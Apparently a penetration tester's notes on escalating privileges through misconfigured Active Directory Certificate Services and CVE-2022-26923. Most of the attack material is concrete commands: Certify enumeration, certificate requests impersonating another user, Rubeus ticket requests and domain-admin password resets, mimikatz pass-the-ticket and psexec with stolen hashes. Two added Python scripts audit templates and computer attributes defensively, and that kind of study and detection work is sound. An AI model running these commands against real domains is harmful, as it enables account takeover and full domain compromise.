Active Directory Certificate Services (AD CS)
- Internal CA
- PKI
- File system encryption
- Digital signatures
- User authentication
- Certificates are not revoked after an account password reset; an issued certificate stays valid until it expires or is revoked manually
Certificate Templates
- Extended/Enhanced Key Usage (EKU)
- Certain combinations of template parameters can be exploited
- User certificates may be requested by members of the Domain Users group
- Machine certificates may be requested by hosts in the Domain Computers group
Enumeration
certutil -v -template > ct.txt
Exploitable templates should have the following traits:
- Allow Enroll or Allow Full Control permissions to request a certificate. Find the groups a user belongs to with
  net user <username> /domain
  --> Domain Users, Domain Computers
- Client Authentication EKU, usable for Kerberos authentication --> Client Authentication
- Permission for the enrollee to supply the subject alternative name (SAN), e.g. a URL for which to encrypt; the SAN is used to create the Kerberos ticket --> CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
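The three traits above can be checked mechanically over the certutil dump instead of by reading ct.txt by hand. The following audit script is an added example and not part of these notes or of certutil; the sample text it parses is a constructed, heavily trimmed imitation of the `certutil -v -template` format (only the fields the check needs), so the parser assumes that simplified shape. The authentication-EKU list, the CT_FLAG values and the "manager approval / RA signatures" exceptions follow the publicly documented ESC1 criteria.

```python
"""Audit certutil -v -template output for templates with ESC1-style settings.

Added example, not part of the original notes. SAMPLE_CERTUTIL_OUTPUT is a
constructed, trimmed imitation of certutil's format; the parser assumes it.
"""
import re

# EKU OIDs that let a certificate be used for domain (Kerberos) authentication.
# A template with no EKU at all is treated the same way.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
# Principals whose enroll rights mean "anyone in the domain can enroll".
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone", "Users"}

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in TemplatePropSubjectNameFlags
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in TemplatePropEnrollmentFlags (manager approval)

# Constructed sample: one safe default template, one ESC1-style template,
# one that is enrollee-supplied but not usable for logon, one gated by approval.
SAMPLE_CERTUTIL_OUTPUT = """\
Template[0]:
  TemplatePropCommonName = User
  TemplatePropEKUs =
    1.3.6.1.5.5.7.3.2 Client Authentication
    1.3.6.1.4.1.311.10.3.4 Encrypting File System
  TemplatePropEnrollmentFlags = 41 (0x29)
  TemplatePropSubjectNameFlags = -1509949440 (0xa6000000)
  TemplatePropRASignatureCount = 0
    Allow Enroll\tCONTOSO\\Domain Users
Template[1]:
  TemplatePropCommonName = VPNUsers
  TemplatePropEKUs =
    1.3.6.1.5.5.7.3.2 Client Authentication
  TemplatePropEnrollmentFlags = 0 (0x0)
  TemplatePropSubjectNameFlags = 1 (0x1)
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  TemplatePropRASignatureCount = 0
    Allow Enroll\tCONTOSO\\Domain Users
    Allow Full Control\tCONTOSO\\Domain Admins
Template[2]:
  TemplatePropCommonName = WebServer
  TemplatePropEKUs =
    1.3.6.1.5.5.7.3.1 Server Authentication
  TemplatePropEnrollmentFlags = 0 (0x0)
  TemplatePropSubjectNameFlags = 1 (0x1)
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  TemplatePropRASignatureCount = 0
    Allow Enroll\tCONTOSO\\Domain Users
Template[3]:
  TemplatePropCommonName = ApprovedAdminLogon
  TemplatePropEKUs =
    1.3.6.1.5.5.7.3.2 Client Authentication
  TemplatePropEnrollmentFlags = 2 (0x2)
    CT_FLAG_PEND_ALL_REQUESTS -- 2
  TemplatePropSubjectNameFlags = 1 (0x1)
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  TemplatePropRASignatureCount = 0
    Allow Enroll\tCONTOSO\\Domain Users
"""

_EKU_RE = re.compile(r"(\d+(?:\.\d+)+)\s")
_FLAGS_RE = re.compile(r"(TemplatePropSubjectNameFlags|TemplatePropEnrollmentFlags) = -?\d+ \((0x[0-9a-fA-F]+)\)")
_RA_RE = re.compile(r"TemplatePropRASignatureCount = (\d+)")
_ACL_RE = re.compile(r"Allow (Enroll|Full Control)\s+(.+)")


def parse_templates(text):
    """Split the dump into one dict per Template[...] block with the fields we audit."""
    templates, current = [], None
    for raw in text.splitlines():
        if raw.startswith("Template["):
            current = {"name": None, "ekus": set(), "subject_flags": 0,
                       "enrollment_flags": 0, "ra_signatures": 0, "enroll_rights": set()}
            templates.append(current)
            continue
        if current is None:
            continue
        line = raw.strip()
        if line.startswith("TemplatePropCommonName ="):
            current["name"] = line.split("=", 1)[1].strip()
            continue
        m = _EKU_RE.match(line)
        if m:
            current["ekus"].add(m.group(1))
            continue
        m = _FLAGS_RE.match(line)
        if m:
            key = "subject_flags" if m.group(1) == "TemplatePropSubjectNameFlags" else "enrollment_flags"
            current[key] = int(m.group(2), 16)
            continue
        m = _RA_RE.match(line)
        if m:
            current["ra_signatures"] = int(m.group(1))
            continue
        m = _ACL_RE.match(line)
        if m:
            # "CONTOSO\Domain Users" -> "Domain Users"
            current["enroll_rights"].add(m.group(2).strip().split("\\")[-1])
    return templates


def audit_esc1(templates):
    """Return {template name: [reasons]} for templates showing all three ESC1 traits
    and lacking the two controls that would still block abuse (approval, RA signatures)."""
    findings = {}
    for t in templates:
        reasons = []
        if t["subject_flags"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
            reasons.append("enrollee supplies subject/SAN")
        if not t["ekus"] or t["ekus"] & AUTH_EKUS:
            reasons.append("authentication-capable EKU")
        broad = t["enroll_rights"] & LOW_PRIV_GROUPS
        if broad:
            reasons.append("enrollable by " + ", ".join(sorted(broad)))
        if len(reasons) < 3:
            continue
        if t["enrollment_flags"] & CT_FLAG_PEND_ALL_REQUESTS or t["ra_signatures"] > 0:
            continue  # manager approval / required signatures mitigate the template
        findings[t["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, why in audit_esc1(parse_templates(SAMPLE_CERTUTIL_OUTPUT)).items():
        print(name, "->", "; ".join(why))
```

On the constructed dump only VPNUsers is reported: the default User template does not let the enrollee supply the subject, WebServer has no logon EKU, and ApprovedAdminLogon requires manager approval. Running the same check over a real ct.txt tells you which templates need their enrollment ACLs or name flags tightened.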
Certify
Finds information about all registered CAs. As a starting point, look at least at
Certify.exe find /vulnerable
Certificate Creation
Win+R --> mmc --> File --> Add/Remove Snap-in --> Certificates (if it is an administration account, request the certificate for the Computer Account)
- After that, in the main menu: Certificates --> right click on Personal --> All Tasks --> Request Certificates --> Next --> Next --> "More information is required to enroll this certificate" --> Common Name --> CN=concerto && User Principal Name is the user to impersonate --> OK --> select User Request --> Enroll
- After that, in the main menu: Personal --> Certificates --> the certificate. Right click the certificate --> All Tasks --> Export --> Yes, export private key --> PFX --> set Password --> Save
An alternative is certipy-ad
Certipy-AD
First pip install certipy-ad.
Take a look at the documentation in the git repository's README.
Since it is possible to create certificates of (sub-)CAs if you have the right permissions on the CA directly, it is worth a check.
Hacktricks' AD CS Domain Escalation provides the details.
Impersonation
Request a TGT with the created certificate. On the target machine:
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
Select a domain admin by opening Active Directory Users and Computers, then:
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
- runas /user:<domain>\<username of DA> cmd.exe
- Alternatively, load the outfile of Rubeus via mimikatz to authenticate as the impersonated user against the remote domain:
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
On the attacking machine, use impacket's psexec:
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
CVE-2022-26923
- Aims at abusing the template configuration, specifically the Subject Alternative Name (SAN): set it to someone with higher permissions
- User and machine certificate templates:
  - For user templates the User Principal Name is used for the SAN; this template cannot be modified in a way that escalates privileges
  - For computer accounts the DNS name is used for the SAN
- Members of the Authenticated Users group can create 10 machine accounts, each of which can be issued a machine certificate
- The DNS hostname is used for authentication
- Service Principal Names (SPNs) associate a service logon with a service instance; SPNs are unique
- Permissions of interest, both are needed:
  - Validated write to DNS hostname: allows updating the DNS hostname of the AD object associated with the host
  - Validated write to SPN: allows updating the SPN of the AD object associated with the host
Usage
- A user account has to be compromised; use it to enrol a new host on the domain
- Alter the DNS hostname attribute of the AD object to that of a Domain Controller or another higher-privileged machine
- Remove the SPN attribute to bypass the SPN uniqueness check
- With the default template, request the machine certificate
- Authenticate via Kerberos with the certificate as the higher-privileged machine
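The attribute changes described in the Usage steps leave a visible trace on the computer object: a dNSHostName that no longer matches the account name, a dNSHostName shared with a domain controller, and an emptied servicePrincipalName. The script below is an added example (not part of these notes and not a Certipy or Microsoft tool) that applies those three checks to computer objects; the records are constructed to look like the attributes an LDAP query for computer objects would return, so the attribute names and the `contoso.local` domain are assumptions.

```python
"""Flag computer objects whose dNSHostName / SPN attributes look tampered with
in the way CVE-2022-26923 relies on.

Added example, not part of the original notes. SAMPLE_COMPUTERS is constructed;
in practice the same dicts would come from an LDAP query over computer objects.
"""

# Constructed sample: a DC, a normal workstation, and a freshly enrolled host
# whose dNSHostName was rewritten to the DC's name and whose SPNs were removed.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "dc01.contoso.local",
     "servicePrincipalName": ["HOST/dc01.contoso.local", "HOST/DC01"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.contoso.local",
     "servicePrincipalName": ["HOST/ws01.contoso.local", "HOST/WS01"]},
    {"sAMAccountName": "NEWHOST$", "dNSHostName": "dc01.contoso.local",
     "servicePrincipalName": []},
]


def short_host(dns_host_name):
    """Leftmost DNS label, lower-cased: 'dc01.contoso.local' -> 'dc01'."""
    return dns_host_name.split(".")[0].lower() if dns_host_name else ""


def audit_computers(computers):
    """Return {sAMAccountName: [reasons]} for suspicious computer objects.

    Signals (each reported separately so the reviewer sees why):
      1. dNSHostName does not start with the account's own name (sAMAccountName minus '$').
      2. dNSHostName is shared with another computer object; the other object is the
         likely impersonation target, so it is reported too.
      3. servicePrincipalName is empty, which a normally domain-joined host never has.
    """
    # Index every dNSHostName so collisions can be found in one pass.
    by_dns = {}
    for c in computers:
        by_dns.setdefault((c.get("dNSHostName") or "").lower(), []).append(c["sAMAccountName"])

    findings = {}
    for c in computers:
        name = c["sAMAccountName"]
        expected = name.rstrip("$").lower()
        dns = (c.get("dNSHostName") or "").lower()
        reasons = []
        if short_host(dns) != expected:
            reasons.append("dNSHostName %r does not match account name %r" % (dns, expected))
        others = [n for n in by_dns.get(dns, []) if n != name]
        if dns and others:
            reasons.append("dNSHostName shared with " + ", ".join(sorted(others)))
        if not c.get("servicePrincipalName"):
            reasons.append("no servicePrincipalName set")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for account, why in audit_computers(SAMPLE_COMPUTERS).items():
        print(account, "->", "; ".join(why))
```

On the sample, NEWHOST$ trips all three signals and DC01$ is reported once because its name is now shared; WS01$ is clean. Checking the same attributes periodically, or on every change to dNSHostName and servicePrincipalName, catches the precondition of the attack before a certificate is ever requested.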